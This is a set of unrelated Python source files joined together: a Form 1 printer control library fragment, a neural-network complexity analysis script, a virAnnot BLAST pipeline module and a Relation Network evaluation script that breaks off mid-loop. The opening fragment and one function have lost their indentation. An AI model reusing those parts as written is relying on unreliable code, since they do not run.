lastxy_ticks = self.mm_to_galvo(xydtmW[0][0], xydtmW[0][1])
for x_mm, y_mm, dt_s, mW in xydtmW:
if mW != last_mW:
if xyticks:
result.append(FLP.XYMove(xyticks))
xyticks = []
result.append(FLP.LaserPowerLevel(self.mW_to_ticks(mW)))
last_mW = mW
xy_ticks = self.mm_to_galvo(x_mm, y_mm)
dt_ticks = dt_s * clock_Hz
# Deal with potential that the move takes too long to fit in one step:
for i in range(int(dt_ticks // 0xffff)):
alpha = (i+1) * 0xffff / dt_ticks
x = np.interp(alpha, [0.0, 1.0], [lastxy_ticks[0], xy_ticks[0]])
y = np.interp(alpha, [0.0, 1.0], [lastxy_ticks[1], xy_ticks[1]])
xyticks.append((x, y, 0xffff))
dt_ticks %= 0xffff # Now we just have to do the last little bit.
xyticks.append(tuple(xy_ticks) + (dt_ticks,))
lastxy_ticks = xy_ticks
if xyticks:
result.append(FLP.XYMove(xyticks))
return result
    @staticmethod
    def mm_to_galvo_approx(x, y=None):
        """ Given one or many points in mm space, map them to galvo space.

        Approximate, printer-independent variant: the Px/Py coefficients
        below are a polynomial fit across all Form 1/1+ printers rather than
        this printer's own calibration grid.

        e.g.,
        >>> Printer.mm_to_galvo_approx(0, 0) # -> galvo ticks for middle of build area.
        >>> Printer.mm_to_galvo_approx([[0, 1, 2], [0, 0, 0]]) # -> A three-segment line along the x axis.
        """
        xy = x
        if y is not None:
            if np.shape(x) != np.shape(y):
                raise TypeError('x and y shapes must match. Got x.shape: {}, y.shape: {}'.format(np.shape(x), np.shape(y)))
            xy = np.array([x, y]) # Allows calling with just an x and a y.
        # These polynomials are a fit to all Form 1/1+s.
        # 16 coefficients each -> 4x4 polynomial evaluated by polyval2d below.
        Px = np.array([ 3.27685507e+04, 4.80948842e+02, -1.22079970e-01,
        -2.88953161e-03, 6.08478254e-01, -8.81889894e-02,
        -2.20922460e-05, 4.41734858e-07, 6.76006698e-03,
        -1.02093319e-05, -1.43020804e-06, 2.03140758e-08,
        -6.71090318e-06, -4.36026159e-07, 2.62988209e-08,
        8.32187652e-11])
        Py = np.array([ 3.27661362e+04, 5.69452975e-01, -2.39793282e-03,
        9.83778919e-06, 4.79035581e+02, -8.13031539e-02,
        -2.66499770e-03, -4.40219799e-07, -1.06247442e-01,
        5.18419181e-05, 1.47754740e-06, -1.60049118e-09,
        -2.44473912e-03, -1.31398011e-06, 1.83452740e-08,
        3.16943985e-10])
        xy = np.asarray(xy, dtype=float)
        if xy.shape[0] != 2:
            raise TypeError('xy must be a two-vector or 2xn or 2xmxn... not shape {}.'.format(xy.shape))
        shp = xy.shape[1:] # polyval2d wants vector inputs, not multidimensional.
        # Evaluate both fitted polynomials, restoring the input's trailing shape.
        return np.array([polyval2d(P, *xy.reshape(2,-1)).reshape(shp) for P in (Px, Py)])
def polyval2d(m, x, y):
    """Evaluate a 2-D polynomial with coefficient vector ``m`` at (x, y).

    The coefficient for the x**i * y**j term is m[i*(order+1) + j], where
    order = sqrt(len(m)) - 1.

    From http://stackoverflow.com/a/7997925/874660
    """
    import itertools
    order = int(np.sqrt(len(m))) - 1
    # BUG FIX: accumulate in float; zeros_like(x) inherits an integer dtype
    # for integer inputs, which truncates (or raises on modern NumPy).
    z = np.zeros_like(x, dtype=float)
    ij = itertools.product(range(order + 1), range(order + 1))
    for coeff, (i, j) in zip(m, ij):
        z += coeff * x ** i * y ** j
    return z
################################################################################
class DummyPrinter(Printer):
    """ DummyPrinter lets you test some functionality without a printer connected.

    Print-data blocks are kept in an in-memory dict instead of being sent to
    hardware, and machine state is tracked locally.
    """
    def __init__(self):
        super(DummyPrinter, self).__init__(connect=False)
        self._laser_xypower = [0, 0, 0]  # last (x, y, power) sent to the laser
        self._blocks = dict()  # block number -> raw block bytes
        self._state = State.MACHINE_OFF
    def poll(self):
        raise NotImplementedError()
    def initialize(self):
        """Simulate powering up: mark ready and reset all axis state."""
        self._state = State.MACHINE_READY_TO_PRINT
        self._zpos_usteps = 0  # FIXME: Need to know where z starts.
        self._zcurrent = 40
        self._zspeed_usteps_per_s = 0
        self._tiltpos_usteps = 0
        self._tiltcurrent = 40
        self._tiltspeed_usteps_per_s = 0
    def shutdown(self):
        self._state = State.MACHINE_OFF
    def list_blocks(self):
        return self._blocks.keys()
    def delete_block(self, block, end=None):
        """Delete blocks `block`..`end` inclusive (just `block` if end is None)."""
        if end is None:
            end = block
        for i in range(block, end + 1):
            if i in self._blocks:
                del self._blocks[i]
    def read_block_raw(self, block):
        return self._blocks[block]
    def block_size(self, block):
        # BUG FIX: `block` was not a parameter, so this always raised NameError.
        return len(self._blocks[block])
    def _command(self, cmd, payload=b'', wait=True, expect_success=False):
        """Emulate the device command protocol for a few supported commands."""
        header = struct.Struct('<III')
        # BUG FIX: the (block, length, checksum) header was unpacked
        # unconditionally, so commands issued with the default empty payload
        # (e.g. CMD_MACHINE_STATE) raised struct.error.
        if cmd == Command.CMD_LOAD_PRINT_DATA_BLOCK:
            block, length, checksum = header.unpack(payload[:header.size])
            data = payload[header.size:]
            assert len(data) == length
            self._blocks[block] = data
        elif cmd == Command.CMD_MACHINE_STATE:
            return self._state
        elif cmd == Command.CMD_MOVE_Z_STEPPER_INCREMENTAL:
            s = struct.Struct('<iIB')
            steps, feedrate, current = s.unpack(payload[header.size:])
            self._zpos_usteps += steps
            self._zspeed_usteps_per_s = feedrate
    def set_laser_uint16(self, x, y, power=25000):
        """ Sets the position and laser power level
        x and y are unsigned 16-bit values (0 to 0xffff)
        (with 0 at the corner of the platform)
        power is an unsigned 16-bit integer
        Setting power too high can damage your diode!
        """
        if self.AUDIT_LASER_POWER:
            # This raises if the power is too high:
            self.check_laser_ticks(power)
        self._laser_xypower = [x, y, power]
    def read_laser_table(self):
        # Canned (mW setting, measured mW, ticks) calibration rows.
        return np.array([[0, 0, 0], [0.0, 0.0, 1.0], [0.1, 0.01, 2.0], [0.2, 0.01, 2.0], [0.3, 0.02, 3.0], [0.4, 0.02, 4.0], [0.5, 0.03, 6.0], [0.6, 0.03, 7.0], [0.7, 0.04, 8.0], [0.8, 0.06, 10.0], [0.9, 0.11, 12.0], [1.0, 1.16, 40.0], [1.1, 5.27, 144.0], [1.2, 9.37, 239.0], [1.3, 13.42, 339.0], [1.4, 17.68, 441.0], [1.5, 21.91, 543.0], [1.6, 26.08, 645.0], [1.7, 30.48, 747.0], [1.8, 34.73, 853.0], [1.9, 38.86, 958.0], [2.0, 43.18, 1061.0], [2.1, 47.67, 1169.0], [2.2, 51.93, 1276.0], [2.3, 56.1, 1381.0], [2.4, 60.61, 1489.0], [2.5, 65.06, 1589.0], [2.6, 69.01, 1702.0], [2.7, 73.45, 1798.0], [2.8, 77.69, 1907.0], [2.9, 82.51, 2021.0]])
    def read_grid_table(self):
        # Canned 5x5 grid of (x, y) galvo ticks used by the mm<->galvo fit.
        return np.array([[[ 2302, 2736], [ 2251, 17532], [ 2141, 32820], [ 1972, 47937], [ 1757, 62382]],
                         [[16833, 2212], [16744, 17245], [16608, 32800], [16420, 48168], [16207, 62848]],
                         [[32294, 2003], [32182, 17099], [32026, 32748], [31840, 48228], [31621, 62979]],
                         [[47858, 2131], [47740, 17142], [47592, 32705], [47406, 48093], [47146, 62737]],
                         [[62745, 2589], [62624, 17351], [62469, 32651], [62258, 47773], [62017, 62194]]])
################################################################################
from enum import Enum
class Response(Enum):
    """ Response codes returned by many commands.

    SUCCESS is 0; other codes are either error conditions (ERROR_*) or
    asynchronous status notifications (STATUS_*) from the firmware.
    """
    SUCCESS = 0
    ERROR_MALFORMED_REQUEST = 0x01
    ERROR_OUT_OF_MEMORY = 0x02
    ERROR_CRC_ERROR = 0x03
    ERROR_INPUT_VOLTAGE_TOO_LOW = 0x04
    ERROR_INPUT_VOLTAGE_TOO_HIGH = 0x05
    ERROR_COVER_OPEN = 0x06
    ERROR_PAUSE_BUTTON_PRESSED = 0x07
    ERROR_TIMEOUT_ON_Z_STEPPER_HOME = 0x08
    ERROR_ALREADY_PRINTING = 0x09
    ERROR_FAT = 0x10
    ERROR_COVER_CLOSE = 0x11
    STATUS_PRINT_STOPPED_DUE_TO_STOP = 0x12
    STATUS_PRINT_STOPPED_DUE_TO_ABORT = 0x13
    ERROR_NOT_PRINTING = 0x14
    STATUS_PRINTING_RESUMED_FROM_PAUSE = 0x15
    ERROR_INVALID_JOB = 0x16
    ERROR_SERIAL_WRITE_UNSUCCESSFUL = 0x17
    ERROR_INVALID_BLOCK_NUMBER = 0x18
    ERROR_PRINTER_OFF = 0x19
    ERROR_INVALID_MEMORY_ADDRESS = 0x1A
    ERROR_JOB_ALREADY_RUNNING = 0x1B
    ERROR_SD_CARD = 0x1C
    ERROR_LASER_ALREADY_CALIBRATING = 0x1D
    ERROR_FILE_NOT_FOUND = 0x1E
    ERROR_FILE_ALREADY_EXISTS = 0x1F
    ERROR_NOT_A_DIRECTORY = 0x20
    ERROR_NOT_A_FILE = 0x21
    ERROR_FILE_ERROR = 0x22
    ERROR_UNIMPLEMENTED = 0x97
    ERROR_MISC = 0x98
    ERROR_USB_TIMEOUT = 0x99
class Command(Enum):
    """ Big list of commands.

    Command bytes sent to the printer; values are grouped by subsystem
    (machine control 0x0x, jobs 0x1x, print data 0x2x, motion 0x3x,
    calibration tables 0x4x, I/O 0x5x, SD storage 0x6x) plus asynchronous
    STATUS_*/DEBUG_* notification codes at 0x80+.
    """
    CMD_MACHINE_INFORMATION = 0x01
    CMD_INITIALIZE = 0x02
    CMD_SHUTDOWN = 0x03
    CMD_SET_TIME = 0x04
    CMD_DROP_TO_BOOTLOADER = 0x05
    CMD_PRINTER_STATUS = 0x06
    CMD_MACHINE_STATE = 0x07
    CMD_REQUIRED_PREFORM_VERSION = 0x08
    CMD_READ_CPU_INFORMATION = 0x09
    CMD_JOB_START = 0x10
    CMD_JOB_LOAD_BLOCK = 0x11
    CMD_JOB_INFORMATION = 0x12
    CMD_JOB_STOP = 0x13
    CMD_LOAD_PRINT_DATA_BLOCK = 0x20
    CMD_START_PRINTING = 0x21
    CMD_BLOCK_INFORMATION = 0x22
    CMD_DELETE_BLOCKS = 0x23
    CMD_LIST_BLOCKS = 0x24
    CMD_STOP_PRINTING = 0x25
    CMD_PAUSE_PRINTING = 0x26
    CMD_UNPAUSE_PRINTING = 0x27
    CMD_READ_BLOCK = 0x28
    CMD_READ_BLOCK_DATA = 0x29
    CMD_FORMAT_SDCARD = 0x2A
    CMD_MOVE_Z_STEPPER_INCREMENTAL = 0x30
    CMD_MOVE_TILT_STEPPER_INCREMENTAL = 0x31
    CMD_POSITION_LASER = 0x32
    CMD_MOVE_Z_STEPPER_TO_LIMIT_SWITCH = 0x33
    CMD_READ_LASER_TABLE = 0x44
    CMD_READ_GRID_TABLE = 0x45
    CMD_READ_ZSENSOR_HEIGHT = 0x46
    CMD_WRITE_DIO = 0x50
    CMD_READ_DIO = 0x51
    CMD_READ_ADC_INPUT = 0x52
    CMD_INIT_SD_STORAGE = 0x60
    CMD_CLOSE_SD_STORAGE = 0x61
    CMD_READ_FILE = 0x62
    CMD_WRITE_FILE = 0x63
    CMD_DELETE_FILE = 0x64
    CMD_CREATE_DIRECTORY = 0x65
    # NOTE: 0x67/0x66 are deliberately listed out of numeric order here;
    # the values themselves are what matter on the wire.
    CMD_READ_DIRECTORY = 0x67
    CMD_DELETE_DIRECTORY = 0x66
    CMD_GET_FILE_INFORMATION = 0x68
    STATUS_LAYER_DONE = 0x80
    STATUS_LAYER_NON_FATAL_ERROR = 0x81
    STATUS_BLOCK_DONE = 0x84
    STATUS_PRINT_DONE = 0x82
    DEBUG_STRING = 0x90
class State(Enum):
    """Machine state codes (as returned for CMD_MACHINE_STATE)."""
    MACHINE_OFF = 0
    MACHINE_POWERING_UP = 1
    MACHINE_RAISING_PLATFORM = 2
    MACHINE_READY_TO_PRINT = 3
    MACHINE_PRINTING = 4
    MACHINE_PRINTING_PAUSE_PENDING = 5
    MACHINE_PRINTING_PAUSED = 6
    MACHINE_STOPPING_PRINT = 7
    MACHINE_SHUTTING_DOWN = 8
    MACHINE_ERROR = 9
    MACHINE_HARD_ERROR = 10
    MACHINE_STATE_NONE = 11
if __name__ == '__main__':
    # This module is a library; running it directly prints a notice and exits.
    FLP.print_not_a_script_message_and_exit()
|
<reponame>jsiloto/adaptive-cob
import argparse
import datetime
import time
import os
import sys
import numpy as np
import torch
from torch import nn
from models import load_ckpt, get_model, save_ckpt
from myutils.common import file_util, yaml_util
from utils import data_util, main_util, misc_util
from models.slimmable.slimmable_ops import USConv2d, USBatchNorm2d, USConv2dStaticSamePadding
from models.mimic.base import set_width
from ptflops import get_model_complexity_info
from myutils.pytorch import func_util, module_util
from analyzer.hooks import usconv_flops_counter_hook, bn_flops_counter_hook
from analyzer.encoder import full_encoder
from analyzer.analysis import hide_prints
import warnings
from analyzer.analysis import model_analysis
import os
from os import listdir
from os.path import isfile, join
import pandas as pd
from pathlib import Path
def get_argparser():
    """Build the command-line argument parser for the Mimic Runner.

    Returns:
        argparse.ArgumentParser with --config, --dir, --device and -debug.
    """
    argparser = argparse.ArgumentParser(description='Mimic Runner')
    argparser.add_argument('--config', required=False, help='yaml file path')
    # BUG FIX: help text was a copy-paste of --config's ('yaml file path');
    # main() treats this as a directory of yaml configs.
    argparser.add_argument('--dir', required=False, help='directory containing yaml config files')
    argparser.add_argument('--device', default='cuda', help='device')
    argparser.add_argument('-debug', action='store_true', help='')
    return argparser
def summarize(results):
size = results['input_size']
jpeg_size = results["jpeg_size"]
macs_encoder = results['macs_base_encoder']+ results['macs_compressor']
params_encoder = results['params_base_encoder'] + results['params_compressor']
macs_full = results["macs_decoder"] + macs_encoder
params_full = results["params_decoder"] + params_encoder
print("{}: input shape ({} Bytes)".format((1, 3, size, size), size * size * 3))
print("{}: output shape".format(results['output_shape']))
print("{} Encoder Bytes {:.2f}%: Compression".format(np.prod(results["output_shape"]), results["compression"] * 100))
print("{} JPEG Bytes {:.2f}%: JPEG 95 Compression".format(jpeg_size, results["jpeg_compression"] * 100))
print("{:<30} {:.1f} GMacs {:.1f}k params".format("Base Encoder:", results['macs_base_encoder'] / 1e9, results['params_base_encoder']/ 1e3))
print("{:<30} {:.1f} GMacs {:.1f}k params".format("Compression Encoder:", results['macs_compressor'] / 1e9, results['params_compressor'] / 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Full Encoder: ',macs_encoder/1e9, params_encoder/ 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Decoder: ', results["macs_decoder"]/ 1e9,results["params_decoder"] / 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Full Model: ', macs_full / 1e9, params_full / 1e3))
def main(args):
    """Run model analysis for one yaml config, or for every yaml in a directory.

    Args:
        args: argparse namespace with ``config``, ``dir``, ``device``, ``debug``.
    """
    assert not (args.config and args.dir)  # the two modes are mutually exclusive
    if args.config:
        print(args.config)
        config = yaml_util.load_yaml_file(args.config)
        width_list = [1.0]
        if 'slimmable' in config['student_model']['backbone']['params']:
            width_list = config['student_model']['backbone']['params']['width_mult_list']
        results = model_analysis(config, args.device, setting='Teacher', debug=False)
        print("************** Teacher *************")
        summarize(results)
        print("************** Student *************")
        for width in width_list:
            results = model_analysis(config, args.device, setting=width, debug=False)
            summarize(results)
    elif args.dir:
        # BUG FIX: this was `elif "dir" in args:`, which is always true for a
        # Namespace that defines --dir (membership tests attribute presence),
        # so invoking the script with neither flag crashed on join(None, ...).
        result_dir = join(args.dir, "results")
        Path(result_dir).mkdir(parents=True, exist_ok=True)
        config_file_list = [f for f in listdir(args.dir) if isfile(join(args.dir, f))]
        config_file_list = [f for f in config_file_list if f.endswith('.yaml')]
        for config_file in config_file_list:
            result_file = join(result_dir, config_file).split('.yaml')[0] + ".csv"
            config_file = join(args.dir, config_file)
            print("#################################################################################")
            print("config_file: {},".format(config_file))
            print("result_file: {},".format(result_file))
            # Build Model
            config = yaml_util.load_yaml_file(config_file)
            student_model_config = config['student_model']
            if isfile(result_file):
                df = pd.read_csv(result_file)
                # Drop index columns written by previous to_csv round-trips.
                df = df.loc[:, ~df.columns.str.match("Unnamed")]
                # NOTE(review): reset_index()/set_index() return new frames that
                # are discarded, so both calls are no-ops as written; the loop
                # below relies on 'Setting' staying a regular column.
                df.reset_index()
                df.set_index("Setting")
            else:
                # No previous results to re-analyze for this config.
                continue
            new_df = []
            for index, row in df.iterrows():
                setting = row['Setting']
                results = model_analysis(config, args.device, setting=setting, debug=args.debug)
                results.update(row.to_dict())
                new_df.append(results)
            new_df = pd.DataFrame(new_df)
            new_df.reset_index()  # NOTE(review): no-op, result discarded
            new_df.set_index("Setting")  # NOTE(review): no-op, result discarded
            new_df.to_csv(result_file)
if __name__ == '__main__':
    # Parse CLI arguments and dispatch to single-config or directory mode.
    parser = get_argparser()
    main(parser.parse_args())
|
<reponame>marieBvr/virAnnot
# to allow code to work with Python 2 and 3
from __future__ import print_function # print is a function in python3
from __future__ import unicode_literals # avoid adding "u" to each string
from __future__ import division # avoid writing float(x) when dividing by x
import os.path
import logging as log
import random
import string
from Bio import SeqIO
from Blast import Blast
class Rps2blast:
    """
    This module is part of virAnnot module
    This will select viral sequences from RPS results and
    run Blast on these sequences only.
    """
    def __init__(self, args):
        """Prepare the rps2blast step: extract candidate contigs, build commands.

        Args:
            args: dict of options; see check_args for the recognized keys.
        """
        self.execution = 1
        self.check_args(args)
        # BUG FIX: this used to rebuild the path from args['bcontigs'], which
        # raised KeyError when 'bcontigs' was omitted even though check_args
        # supplies a default; self.bcontigs is the already-resolved path.
        if not os.path.exists(self.bcontigs):
            self.csv_to_fasta()
        self.cmd = []
        self.ssh_cmd = []
        if self.execution == 1:
            Blast.create_cmd(self)
    def csv_to_fasta(self):
        """
        From rps csv results
        extract query id and generate fasta file
        """
        fasta_file = self.icontigs  # Input fasta file
        wanted_file = self.i  # Input interesting sequence IDs
        result_file = self.bcontigs  # Output fasta file
        wanted = set()
        with open(wanted_file) as f:
            for line in f:
                fields = line.strip().split("\t")
                query_id = fields[0]
                query_length = fields[1]
                # Keep only queries that actually hit something in the RPS run.
                if query_length != "no_hit":
                    wanted.add(query_id.replace("\"", ""))
        fasta_sequences = SeqIO.parse(open(fasta_file), 'fasta')
        with open(result_file, "w") as f:
            for seq in fasta_sequences:
                if seq.id in wanted:
                    SeqIO.write([seq], f, "fasta")
    def get_exec_script(self):
        """Build the shell script that sets up the cluster env and launches blast.

        For the genouest cluster an additional sbatch command file is used.
        """
        ssh_cmd = ''
        if self.server != 'enki':
            # Source whichever shell profile exists on the remote host.
            ssh_cmd += 'if [ -f ~/.bashrc ]; then' + "\n"
            ssh_cmd += 'source ~/.bashrc' + "\n"
            ssh_cmd += 'echo bashrc loaded' + "\n"
            ssh_cmd += 'elif [ -f ~/.profile ]; then' + "\n"
            ssh_cmd += 'source ~/.profile' + "\n"
            ssh_cmd += 'echo profile loaded' + "\n"
            ssh_cmd += 'elif [ -f ~/.bash_profile ]; then' + "\n"
            ssh_cmd += 'source /etc/profile' + "\n"
            ssh_cmd += 'source ~/.bash_profile' + "\n"
            ssh_cmd += 'echo bash_profile loaded' + "\n"
            ssh_cmd += 'else' + "\n"
            ssh_cmd += 'echo "source not found."' + "\n"
            ssh_cmd += 'fi' + "\n"
            # Move the uploaded inputs into a per-run scratch directory.
            ssh_cmd += 'cd ' + self.params['servers'][self.server]['scratch'] + "\n"
            ssh_cmd += 'mkdir ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir + "\n"
            ssh_cmd += 'mv ' + self.params['servers'][self.server]['scratch'] + '/' + os.path.basename(self.contigs) + ' ' + self.out_dir + "\n"
            if self.server == 'genouest':
                ssh_cmd += 'mv ' + self.params['servers'][self.server]['scratch'] + '/' + os.path.basename(self.genouest_cmd_file) + ' ' + self.out_dir + "\n"
            ssh_cmd += 'cd ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir + "\n"
        if self.server == 'genouest':
            self.create_genouest_script()
            ssh_cmd += 'sbatch ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir
            ssh_cmd += '/' + os.path.basename(self.genouest_cmd_file)
        else:
            if self.server == "genologin":
                ssh_cmd += 'sbatch --mem=2G '
            ssh_cmd += 'blast_launch.py -c ' + self.server + ' -n ' + self.num_chunk + ' --n_cpu 8 --tc ' + self.tc
            ssh_cmd += ' -d ' + self.params['servers'][self.server]['db'][self.db]
            if self.server != 'enki':
                ssh_cmd += ' -s ' + os.path.basename(self.contigs)
            else:
                ssh_cmd += ' -s ' + self.contigs
            ssh_cmd += ' --prefix ' + self.out_dir
            ssh_cmd += ' -p ' + self.type + ' -o ' + os.path.basename(self.out) + ' -r ' + ' --outfmt 5'
            ssh_cmd += ' --max_target_seqs ' + self.max_target_seqs
        return ssh_cmd
    def create_genouest_script(self):
        Blast.create_genouest_script(self)
    def check_args(self, args=None):
        """
        Check if arguments are valid and populate instance attributes,
        applying defaults for optional options.
        """
        # BUG FIX: the default used to be `args=dict` (the dict *type* itself),
        # which crashed on the first membership test when omitted.
        if args is None:
            args = {}
        if 'sample' in args:
            self.sample = str(args['sample'])
        self.wd = os.getcwd() + '/' + self.sample
        accepted_type = ['tblastx', 'blastx', 'blastn', 'blastp']
        if 'i' in args:
            if os.path.exists(self.wd + '/' + args['i']):
                self.i = self.wd + '/' + args['i']
                self.execution = 1
            else:
                self.execution = 0
                log.critical('Input file do not exists.')
        if 'icontigs' in args:
            self.icontigs = self.wd + '/' + args['icontigs']
        else:
            self.icontigs = self.wd + '/' + self.sample + "_idba.scaffold.fa"
        if 'bcontigs' in args:
            self.bcontigs = self.wd + '/' + args['bcontigs']
        else:
            self.bcontigs = self.wd + '/' + self.sample + "_idba.scaffold.rps2bltx.fa"
        self.contigs = self.bcontigs
        if 'type' in args:
            if args['type'] in accepted_type:
                self.type = args['type']
            else:
                # BUG FIX: 'str' + list raised TypeError before the message
                # could even be logged.
                log.critical('Wrong blast type. ' + str(accepted_type))
        else:
            log.critical('Blast type is mandatory.')
        if 'n_cpu' in args:
            self.n_cpu = str(args['n_cpu'])
        else:
            log.debug('n_cpu option not found. default 1')
            self.n_cpu = '1'
        if 'sge' in args:
            self.sge = bool(args['sge'])
        else:
            self.sge = False
        if 'tc' in args:
            self.tc = str(args['tc'])
        else:
            self.tc = '5'
        if 'max_target_seqs' in args:
            self.max_target_seqs = str(args['max_target_seqs'])
        else:
            self.max_target_seqs = '5'
        if 'num_chunk' in args:
            self.num_chunk = str(args['num_chunk'])
        else:
            self.num_chunk = '100'
        if 'out' in args:
            self.out = args['out']
        if 'params' in args:
            self.params = args['params']
        if 'server' in args:
            self.server = args['server']
            if 'username' in args['params']['servers'][self.server]:
                self.username = args['params']['servers'][self.server]['username']
            else:
                log.critical('No username defined for cluster.')
        if 'db' in args:
            if args['db'] not in self.params['servers'][self.server]['db']:
                log.critical(args['db'] + ' not defined in parameters file')
            else:
                self.db = args['db']
        else:
            log.critical('You must provide a database name.')
        self.cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_rps2blast_cmd.txt'
        self.remote_cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_remote_rps2blast_cmd.txt'
        self.genouest_cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_genouest_rps2blast_cmd.txt'
        # Random 4-character tag so concurrent runs get distinct remote dirs.
        self.random_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(4))
        self.out_dir = self.random_string + '_' + self.sample + '_' + self.type
|
# -------------------------------------
# Project: Learning to Compare: Relation Network for Few-Shot Learning
# Date: 2017.9.21
# Author: <NAME>
# All Rights Reserved
# -------------------------------------
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.optim.lr_scheduler import StepLR
import numpy as np
import task_generator_test as tg
import os
import math
import argparse
import scipy as sp
import scipy.stats
# NOTE: arguments are parsed at import time (module-level side effect), so
# importing this module requires a compatible sys.argv.
parser = argparse.ArgumentParser(description="One Shot Visual Recognition")
parser.add_argument("-f", "--feature_dim", type=int, default=64)
parser.add_argument("-r", "--relation_dim", type=int, default=8)
parser.add_argument("-w", "--class_num", type=int, default=5)
parser.add_argument("-s", "--sample_num_per_class", type=int, default=5)
parser.add_argument("-b", "--batch_num_per_class", type=int, default=10)
parser.add_argument("-e", "--episode", type=int, default=10)
parser.add_argument("-t", "--test_episode", type=int, default=600)
parser.add_argument("-l", "--learning_rate", type=float, default=0.001)
parser.add_argument("-g", "--gpu", type=int, default=0)
parser.add_argument("-u", "--hidden_unit", type=int, default=10)
parser.add_argument("-exp", "--exp_date", type=str, default="200325-1718")
args = parser.parse_args()
# Hyper Parameters
FEATURE_DIM = args.feature_dim          # encoder output channels
RELATION_DIM = args.relation_dim        # relation-network hidden size
CLASS_NUM = args.class_num              # N in N-way classification
SAMPLE_NUM_PER_CLASS = args.sample_num_per_class  # K in K-shot
BATCH_NUM_PER_CLASS = args.batch_num_per_class
EPISODE = args.episode                  # outer evaluation repetitions
TEST_EPISODE = args.test_episode        # tasks sampled per evaluation
LEARNING_RATE = args.learning_rate
GPU = args.gpu
HIDDEN_UNIT = args.hidden_unit
EXP_DATE = args.exp_date                # tag used to locate checkpoint files
def mean_confidence_interval(data, confidence=0.95):
    """Return (mean, half-width) of the Student-t confidence interval.

    Args:
        data: sequence of numeric samples.
        confidence: confidence level (default 0.95).
    Returns:
        (m, h): sample mean and interval half-width, i.e. the interval
        is m +/- h.
    """
    a = 1.0 * np.array(data)
    n = len(a)
    m, se = np.mean(a), scipy.stats.sem(a)
    # BUG FIX: use the public ppf instead of the private _ppf, which is an
    # internal SciPy API and has been removed/changed across versions.
    h = se * scipy.stats.t.ppf((1 + confidence) / 2., n - 1)
    return m, h
class CNNEncoder(nn.Module):
    """Four-layer convolutional feature encoder.

    Two conv blocks with max-pooling followed by two without; returns a
    64-channel feature map (downstream code in main() reshapes it to
    19x19 spatial size — presumably for 84x84 inputs; confirm).
    """
    def __init__(self):
        super(CNNEncoder, self).__init__()
        self.layer1 = nn.Sequential(
            nn.Conv2d(3, 64, kernel_size=3, padding=0),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2))
        self.layer2 = nn.Sequential(
            nn.Conv2d(64, 64, kernel_size=3, padding=0),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2))
        self.layer3 = nn.Sequential(
            nn.Conv2d(64, 64, kernel_size=3, padding=1),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU())
        self.layer4 = nn.Sequential(
            nn.Conv2d(64, 64, kernel_size=3, padding=1),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU())
    def forward(self, x):
        # Apply the four blocks in sequence; output is left as a feature map
        # (no flattening) so callers can pair features spatially.
        out = self.layer1(x)
        out = self.layer2(out)
        out = self.layer3(out)
        out = self.layer4(out)
        # out = out.view(out.size(0),-1)
        return out  # 64
class RelationNetwork(nn.Module):
    """Relation module: scores a concatenated (sample, query) feature pair.

    Input is a 128-channel feature map (two 64-channel maps concatenated);
    output is a scalar relation score in [0, 1] per pair.
    """
    def __init__(self, input_size, hidden_size):
        super(RelationNetwork, self).__init__()
        self.layer1 = nn.Sequential(
            nn.Conv2d(64 * 2, 64, kernel_size=3, padding=0),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2))
        self.layer2 = nn.Sequential(
            nn.Conv2d(64, 64, kernel_size=3, padding=0),
            nn.BatchNorm2d(64, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2))
        # After the two pooled conv blocks the spatial size is 3x3
        # (for the 19x19 inputs used in main — confirm for other sizes).
        self.fc1 = nn.Linear(input_size * 3 * 3, hidden_size)
        self.fc2 = nn.Linear(hidden_size, 1)
    def forward(self, x):
        out = self.layer1(x)
        out = self.layer2(out)
        out = out.view(out.size(0), -1)
        out = F.relu(self.fc1(out))
        # out = F.sigmoid(self.fc2(out)) # Deprecated
        out = torch.sigmoid(self.fc2(out))
        return out
def main():
    """Evaluate a trained Relation Network on mini-ImageNet test episodes.

    Loads encoder/relation checkpoints (if present), then runs EPISODE
    evaluation rounds of TEST_EPISODE few-shot tasks each, printing a
    t-based confidence interval per round and the overall mean accuracy.
    """
    # Step 1: init data folders
    print("init data folders")
    # init character folders for dataset construction
    metatrain_folders, metatest_folders = tg.mini_imagenet_folders()
    # Step 2: init neural networks
    print("init neural networks")
    feature_encoder = CNNEncoder()
    relation_network = RelationNetwork(FEATURE_DIM, RELATION_DIM)
    feature_encoder.cuda(GPU)
    relation_network.cuda(GPU)
    feature_encoder_fn = os.path.join('./models', "{}_miniimagenet_feature_encoder_{}way_{}shot.pkl".format(
        EXP_DATE, CLASS_NUM, SAMPLE_NUM_PER_CLASS))
    relation_network_fn = os.path.join('./models', "{}_miniimagenet_relation_network_{}way_{}shot.pkl".format(
        EXP_DATE, CLASS_NUM, SAMPLE_NUM_PER_CLASS))
    if os.path.exists(feature_encoder_fn):
        feature_encoder.load_state_dict(torch.load(feature_encoder_fn))
        print("load feature encoder success")
    if os.path.exists(relation_network_fn):
        relation_network.load_state_dict(torch.load(relation_network_fn))
        print("load relation network success")
    total_accuracy = 0.0
    for episode in range(EPISODE):
        # test
        print("Episode-{}\tTesting...".format(episode), end='\t')
        accuracies = []
        for i in range(TEST_EPISODE):
            total_rewards = 0
            task = tg.MiniImagenetTask(metatest_folders, CLASS_NUM, SAMPLE_NUM_PER_CLASS, 15)  # test_dir, 5, 5, 15(test_num))
